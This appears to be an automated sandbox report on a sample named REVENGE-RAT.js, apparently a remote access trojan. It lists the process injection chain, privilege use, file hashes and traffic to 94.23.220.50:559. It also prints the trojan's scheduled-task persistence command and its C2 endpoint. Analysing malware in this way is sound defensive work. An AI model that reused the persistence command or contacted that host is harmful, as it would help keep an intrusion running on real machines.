Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Documents\foldani.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Documents\foldani.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Documents\foldani.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4548 wrote to memory of 4760 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe
PID 4548 wrote to memory of 4760 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe
PID 4548 wrote to memory of 4760 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe
PID 4760 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe
PID 4760 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe
PID 4760 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe
PID 4760 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe
PID 4760 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe
PID 4760 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe
PID 4760 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe
PID 884 wrote to memory of 4660 N/A C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe C:\Users\Admin\Documents\foldani.exe
PID 884 wrote to memory of 4660 N/A C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe C:\Users\Admin\Documents\foldani.exe
PID 884 wrote to memory of 4660 N/A C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe C:\Users\Admin\Documents\foldani.exe
PID 4660 wrote to memory of 2668 N/A C:\Users\Admin\Documents\foldani.exe C:\Users\Admin\Documents\foldani.exe
PID 4660 wrote to memory of 2668 N/A C:\Users\Admin\Documents\foldani.exe C:\Users\Admin\Documents\foldani.exe
PID 4660 wrote to memory of 2668 N/A C:\Users\Admin\Documents\foldani.exe C:\Users\Admin\Documents\foldani.exe
PID 4660 wrote to memory of 2668 N/A C:\Users\Admin\Documents\foldani.exe C:\Users\Admin\Documents\foldani.exe
PID 4660 wrote to memory of 2668 N/A C:\Users\Admin\Documents\foldani.exe C:\Users\Admin\Documents\foldani.exe
PID 4660 wrote to memory of 2668 N/A C:\Users\Admin\Documents\foldani.exe C:\Users\Admin\Documents\foldani.exe
PID 4660 wrote to memory of 2668 N/A C:\Users\Admin\Documents\foldani.exe C:\Users\Admin\Documents\foldani.exe
PID 2668 wrote to memory of 960 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2668 wrote to memory of 960 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2668 wrote to memory of 960 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 960 wrote to memory of 2284 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 960 wrote to memory of 2284 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 960 wrote to memory of 2284 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2668 wrote to memory of 4720 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\SysWOW64\schtasks.exe
PID 2668 wrote to memory of 4720 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\SysWOW64\schtasks.exe
PID 2668 wrote to memory of 4720 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\SysWOW64\schtasks.exe
PID 2668 wrote to memory of 3332 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2668 wrote to memory of 3332 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2668 wrote to memory of 3332 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 4740 wrote to memory of 3364 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Documents\foldani.exe
PID 4740 wrote to memory of 3364 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Documents\foldani.exe
PID 4740 wrote to memory of 3364 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Documents\foldani.exe
PID 3332 wrote to memory of 4372 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 3332 wrote to memory of 4372 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 3332 wrote to memory of 4372 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2668 wrote to memory of 4812 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2668 wrote to memory of 4812 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2668 wrote to memory of 4812 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 4812 wrote to memory of 3372 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 4812 wrote to memory of 3372 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 4812 wrote to memory of 3372 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2668 wrote to memory of 2444 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2668 wrote to memory of 2444 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2668 wrote to memory of 2444 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2444 wrote to memory of 3472 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2444 wrote to memory of 3472 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2444 wrote to memory of 3472 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2668 wrote to memory of 4668 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2668 wrote to memory of 4668 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2668 wrote to memory of 4668 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 4668 wrote to memory of 4332 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 4668 wrote to memory of 4332 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 4668 wrote to memory of 4332 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2668 wrote to memory of 1676 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2668 wrote to memory of 1676 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2668 wrote to memory of 1676 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1676 wrote to memory of 776 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1676 wrote to memory of 776 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1676 wrote to memory of 776 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2668 wrote to memory of 3876 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2668 wrote to memory of 3876 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\REVENGE-RAT.js

C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe

"C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe"

C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe

"C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe"

C:\Users\Admin\Documents\foldani.exe

"C:\Users\Admin\Documents\foldani.exe"

C:\Users\Admin\Documents\foldani.exe

"C:\Users\Admin\Documents\foldani.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ketljfyr.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEC3F.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc1592735C24D046A485936B9EBA6C6822.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\foldani.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc minute /mo 10 /tn "bladzabi" /tr "C:\Users\Admin\Documents\foldani.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\pjxkzgrh.cmdline"

C:\Users\Admin\Documents\foldani.exe

C:\Users\Admin\Documents\foldani.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESED0B.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc9B6625449315408391E32C6D6AA0F6AC.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\tv8d9fii.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEDB6.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc4CD017347A264B2EB9575A79CB9266E.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ks3aeal5.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEEDF.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF966AE98B94E434786A19EC5901CFA.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\wxln2hv-.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEFAA.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc5CF41B3890034FC0B55240DAF1F7DD2E.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\b6wa28ex.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF066.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc2537EA5827D14851B87853BF2F353397.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\8jiuu6qn.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF0E3.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD737156C5AA547DFB570F4FB91D95D7E.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\sinlewel.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF160.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc6E7B9E0031A544C2A310247F9774396C.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\6xcpfogb.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF1DD.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc6B867A7274FE44FBAE31E7C8AC6444BF.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\j5hwri9v.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF23B.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF7D944F392DA4528861D5A75E84BF070.TMP"

C:\Users\Admin\Documents\foldani.exe

"C:\Users\Admin\Documents\foldani.exe"

Network

Country Destination Domain Proto
FR 94.23.220.50:559 tcp
FR 94.23.220.50:559 tcp
FR 94.23.220.50:559 tcp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp
FR 94.23.220.50:559 tcp
FR 94.23.220.50:559 tcp
FR 94.23.220.50:559 tcp

Files

C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe

MD5 3d3e7a0dc5fd643ca49e89c1a0c3bc4f
SHA1 30281283f34f39b9c4fc4c84712255ad0240e969
SHA256 32d49dc703d8c827ca9ff7d5389debf7314b062a989db36d1360aae21a77db0e
SHA512 93ae1ac6739d91488b88f487a252a411d85dc52a409489a61315235e4a3ec6a178cceac207426b779a1494ab792422263652f1ad310b8bab7ad296d2e7222e68

memory/4760-11-0x0000000074DC2000-0x0000000074DC3000-memory.dmp

memory/4760-12-0x0000000074DC0000-0x0000000075371000-memory.dmp

memory/4760-13-0x0000000074DC0000-0x0000000075371000-memory.dmp

memory/4760-14-0x0000000074DC2000-0x0000000074DC3000-memory.dmp

memory/4760-15-0x0000000074DC0000-0x0000000075371000-memory.dmp

memory/884-16-0x0000000000400000-0x000000000040A000-memory.dmp

memory/884-17-0x0000000000400000-0x000000000040A000-memory.dmp

memory/884-20-0x0000000074DC0000-0x0000000075371000-memory.dmp

memory/884-21-0x0000000074DC0000-0x0000000075371000-memory.dmp

memory/884-23-0x0000000074DC0000-0x0000000075371000-memory.dmp

memory/4760-24-0x0000000074DC0000-0x0000000075371000-memory.dmp

memory/884-25-0x0000000074DC0000-0x0000000075371000-memory.dmp

memory/884-38-0x0000000074DC0000-0x0000000075371000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\tacbvfff.exe.log

MD5 cb76b18ebed3a9f05a14aed43d35fba6
SHA1 836a4b4e351846fca08b84149cb734cb59b8c0d6
SHA256 8d0edecf54cbbdf7981c8e41a3ed8621503188a87415f9af0fb8d890b138c349
SHA512 7631141e4a6dda29452ada666326837372cd3d045f773006f63d9eff15d9432ed00029d9108a72c1a3b858377600a2aab2c9ec03764285c8801b6019babcf21c

C:\Users\Admin\AppData\Local\Temp\ketljfyr.cmdline

MD5 31a85935486e4a5cdbdff366163286b0
SHA1 cc8581f80ba150558274b0cfe48e1f66d39d8d79
SHA256 2e7c3a1abacc8b5272e9389b67208a86f63eb43bf2d44eb25b028474c1cda917
SHA512 d02a41b8fe55ed2183b305003b0ff07e12ef1fc21aca30e1c2b9f45b2ac6c9f31c8c1b0df3c06cbc90c65d53462f7c72d9990870c771dda616606b1b618f2f21

C:\Users\Admin\AppData\Local\Temp\ketljfyr.0.vb

MD5 61413d4417a1d9d90bb2796d38b37e96
SHA1 719fcd1e9c0c30c9c940b38890805d7a89fd0fe5
SHA256 24c081f2f8589c160e6c556507f9a9590983445b933ce6a73f889b5096c211d7
SHA512 9d8ef98bcae56a7abe678f08ba4ef76a135a14f6ca63c02a6e1ea2ddda233802e2aad6c4fc309026e16cd3a8e87a04fe6d4a0acfb9736cca6d670926c83d6cd4

C:\Users\Admin\AppData\Local\Temp\vbc1592735C24D046A485936B9EBA6C6822.TMP

MD5 55335ad1de079999f8d39f6c22fa06b6
SHA1 f54e032ad3e7be3cc25cd59db11070d303c2d46d
SHA256 e05c551536a5ee7a7c82b70d01f0b893db89b3dab1cd4c56ea9580e3901071ac
SHA512 ca8c2f680c3d6a61c8ad18b899f7d731f610dc043729a775fd6eade6e11332c1f32c7cf60464b6b3fd41aead9b0c65bc13934574740179931d931516c13027ca

C:\Users\Admin\AppData\Local\Temp\RESEC3F.tmp

MD5 8205ed20f0ca1bc2440f35b24eff373a
SHA1 36b7f1629ef0b6ce4a180622cb459f848f1531c9
SHA256 b0a4b8658564d1b8fd3ad135d29f7ba14e9e4755f2c068e57f026a7a2a712ece
SHA512 b31f41890d25b2c50f3d8b13823c84e4d9fd4848d81780133bd0ec811fff81754bad8ee0ded9531cf1d20bea72fffe24fe3fdd685b5918d3bad7a7ebcede707c

C:\Users\Admin\AppData\Local\Temp\pjxkzgrh.0.vb

MD5 fe8760874e21534538e34dc52009e8b0
SHA1 26a9ac419f9530d6045b691f3b0ecfed323be002
SHA256 1be68e1d0beb3861fd8a519cc4c4d0b4122cbea7109bcf3e08f294705579d439
SHA512 24c249972146048e134b86e909d51d04d3b821605cb08383921e80f6c3595dc65f9315abbd53704387bdda5c2691b5218658823f1de80e39d25152c9d367c6ed

C:\Users\Admin\AppData\Local\Temp\pjxkzgrh.cmdline

MD5 240f5425f710779e0b75d85b162835dc
SHA1 708548b6e2fb3d2f7da3e1016c085b230b2d122c
SHA256 a679f601370dd871f4c109fa5df01e2998ae109427d4ae9cdb966982c52af517
SHA512 bf6ad3456378906d68e5aeb50454bd083eb31fa3edc3d050c6a2ec66c8346cc69f89161bc5f862753eeb03648ea8f00b8bdaf087e724884ca6177e63f44d2c79

C:\Users\Admin\AppData\Local\Temp\vbc9B6625449315408391E32C6D6AA0F6AC.TMP

MD5 dac60af34e6b37e2ce48ac2551aee4e7
SHA1 968c21d77c1f80b3e962d928c35893dbc8f12c09
SHA256 2edc4ef99552bd0fbc52d0792de6aaa85527621f5c56d0340d9a2963cbc9eed6
SHA512 1f1badd87be7c366221eaa184ae9b9ae0593a793f37e3c1ce2d4669c83f06de470053550890ad6781b323b201a8b9d45a5e2df5b88e01c460df45278e1228084

C:\Users\Admin\AppData\Local\Temp\RESED0B.tmp

MD5 bc16ef00842fa7722b0006a27393d75f
SHA1 63bf6fdfddba852e7764e57bcc62a818eb38f0d4
SHA256 40c5fbc69bd4c9e3918085bbb8e9635048fb454574e7312d50568d6f456c0979
SHA512 48f7ca550086b3c3f2e0f69543d56f7bb8a3841da47fd7b2475b5234953d3c56ac834c0747bd30af3c76fe8e871a1d3d0284929657df8af447c40d95365742ec

C:\Users\Admin\AppData\Local\Temp\tv8d9fii.cmdline

MD5 923b1dc02a5020bf43f532c7b1e66989
SHA1 0ab6fec489c98ad4f54398ee2aae8d70aedaa4ab
SHA256 576fa4c89c4cda0324e7117ec2cf62876bcf54d885827fdae8890b43779e6728
SHA512 2d77fd2fc66b16081ee0de67575daea345e5d44ff05bc436188d5f4f74ca2616c32e3adcbdf44579b4de02e27c16cd3acdd49abfe520cce36fbc1671adf6d458

C:\Users\Admin\AppData\Local\Temp\tv8d9fii.0.vb

MD5 05ab526df31c8742574a1c0aab404c5d
SHA1 5e9b4cabec3982be6a837defea27dd087a50b193
SHA256 0453a179e3926d451c45952c7704686fbe7f35ec91d2b3b4d9dc909f6b7a8430
SHA512 1575da9de9cc37d3fb9fdc2a14aeb56d1debfd09534f231a0eddec35cb20ed25032eb709cb907d5d504a450278fe810d6f297939f11b63935518a4bfeb1b4c40

C:\Users\Admin\AppData\Local\Temp\vbc4CD017347A264B2EB9575A79CB9266E.TMP

MD5 3906bddee0286f09007add3cffcaa5d5
SHA1 0e7ec4da19db060ab3c90b19070d39699561aae2
SHA256 0deb26dcfb2f74e666344c39bd16544fcaae1a950be704b1fd4e146e77b12c00
SHA512 0a73de0e70211323d9a8469ec60042a6892426e30ad798a39864ba123c1905d6e22cb8458a446e2f45ec19cf0233fa18d90e5f87ec987b657a35e35a49fea3b0

C:\Users\Admin\AppData\Local\Temp\RESEDB6.tmp

MD5 36bac4922a56df7f569061899260abca
SHA1 2fb07fca9dda3a4a62ca198617a3d874ecc6403c
SHA256 e7845f1a218390bf78e3aa0f292899121b7c1c3656bfb41957938efb59c67656
SHA512 ba6c61e00def241ee5e4f548fa429456361bc682d470684f9355bdc60ef13693c8670b5c960786e03a2c78f1769720f5dafc4d597bb48bbf2b291b4db2669c1a

C:\Users\Admin\AppData\Local\Temp\ks3aeal5.cmdline

MD5 6d5b0b862bf5d418262e84b546a30bd3
SHA1 c8b3948329ab1d3e83c1920ec4e7d825365ae57d
SHA256 43bf164721a000f01ee9339b748b7625d7a8f96616de90ac3203c0ab236c2a92
SHA512 5eb912c4a0a83d86a1b7bc381a9928712de89d05b6f567fd556a9ba5e84ad16eb2f4d880132423686f4359d025c1ff872a5aad52a5826877146b4accfcb50189

C:\Users\Admin\AppData\Local\Temp\ks3aeal5.0.vb

MD5 6989ad9512c924a0d9771ce7e3360199
SHA1 1bcc5312adf332719db83156f493ad365f5bdec6
SHA256 f80c2d143ea239ba9c96fda416193860cd3d3216e264b856466375bb14618168
SHA512 13a0b21b94c5865ec82e4d3d4fca50f2a1948428acc696601ced1f1bf1044338eb5aeee504ca645bd0f6e6c20b2869b832a7fb693618baea756e740af86d5536

C:\Users\Admin\AppData\Local\Temp\RESEEDF.tmp

MD5 7eba78af372e297cff2f7e2ca70683df
SHA1 2fdecd059601e3de662272f71e51f3b9929893e7
SHA256 71805628a8fdd77c4619424147f59a8be167069fbd9982ac9e208c3b9ad9bfc6
SHA512 2ca82f74e8a880614ce50f6967f7bfeea91edd5cb7b81755f7d545b6b2d3f1083a814c2e2a51f11c969e47da940d9f60e2697d4f8d349e64f8f8585da9c8f1db

C:\Users\Admin\AppData\Local\Temp\wxln2hv-.cmdline

MD5 4adb3caef1c912a2e1856a2aab48fb78
SHA1 c060cc3412401aa30d28abd036693fd67eae865a
SHA256 dcb1d8c4f6b98a7a1a4b30795c9943780dc62217a918eb7313b455510f06ee1f
SHA512 a229df745172ad42d77ca21cd16695cfa6807ad6b665d821a0504b56f3f3f995ddadccabc067df3ff1ca734815ede1976c1e2fded1bb06aef3136f2d992c2108

C:\Users\Admin\AppData\Local\Temp\wxln2hv-.0.vb

MD5 9a478476d20a01771bcc5a342accfb4e
SHA1 314cd193e7dae0d95483be2eae5402ce5d215daa
SHA256 e08019db10e6857bff648942f49ae96e3b9159b75e8e62643a8da0ff5b0f3a40
SHA512 56903e24de594dd009ee292ab91ba9333db2426c3da63ceba3242439a1fa5981f390f6185250cb53739e9cfd37dcec6e85bed5641d04f017e29016985cdd3f29

C:\Users\Admin\AppData\Local\Temp\vbc5CF41B3890034FC0B55240DAF1F7DD2E.TMP

MD5 85c61c03055878407f9433e0cc278eb7
SHA1 15a60f1519aefb81cb63c5993400dd7d31b1202f
SHA256 f0c9936a6fa84969548f9ffb4185b7380ceef7e8b17a3e7520e4acd1e369234b
SHA512 7099b06ac453208b8d7692882a76baceec3749d5e19abc1287783691a10c739210f6bdc3ee60592de8402ca0b9a864eb6613f77914b76aec1fc35157d0741756

C:\Users\Admin\AppData\Local\Temp\RESEFAA.tmp

MD5 b3b6acce38cb02596c1b9b4bc046e76e
SHA1 a95b23661e0bbd97ee0abc3a957e12d2b7ca3bca
SHA256 9dc7d42f7cab415b2cea3614699d693eef11b5c89f5acd6db5f5e3d8006a01e4
SHA512 317497844720d95e9a2b49e57e9d5475bb756ce7f3815cfd95b3c4035b18fe2bc13d043feee46b35e547a864662a1c5a4556ca81450b977426a0b0b0f10aba14

C:\Users\Admin\AppData\Local\Temp\b6wa28ex.cmdline

MD5 5987a2bb89c64602bd77a8b3b86aa6e6
SHA1 df957f9d94e62760d646d4d4b3b469cd6960744a
SHA256 6d46e6625a4ac608a391621548bfcb9065b43a0fa8e170f8e0a2e0f2600b2bd2
SHA512 b5076158e72ef831900f6d30b8ac1c9f79cbc409462634f8e2af93bd6ea7fc5ea98e73f8efd327d7076dbc75b8362ba76898c5d25eb0c9b123e1f8a803c107f7

C:\Users\Admin\AppData\Local\Temp\b6wa28ex.0.vb

MD5 b34b98a6937711fa5ca663f0de61d5bb
SHA1 c371025912ab08ae52ff537aaa9cd924dbce6dcc
SHA256 f1dbc184336bf86e88e1cbc422009ff85febd6bc887ae483bc10109f30ebf69a
SHA512 2c27a72d8a2d120a222add219a0e4f11af38421433210ced930c37ccb9a0cc419fe01e45c874aee2c99613785fa4d44a66fa73c41e4dce9810d4deb24476b98f

C:\Users\Admin\AppData\Local\Temp\RESF066.tmp

MD5 148478b4c2b371e0e629fca5acb6b61c
SHA1 18129ea8dadc8cb356ec8a52a1fde5695c48b536
SHA256 c54dc9addf7dc1b54991f782d055b202f93748e34b6df6a3f3ed12e1fe7e9b6b
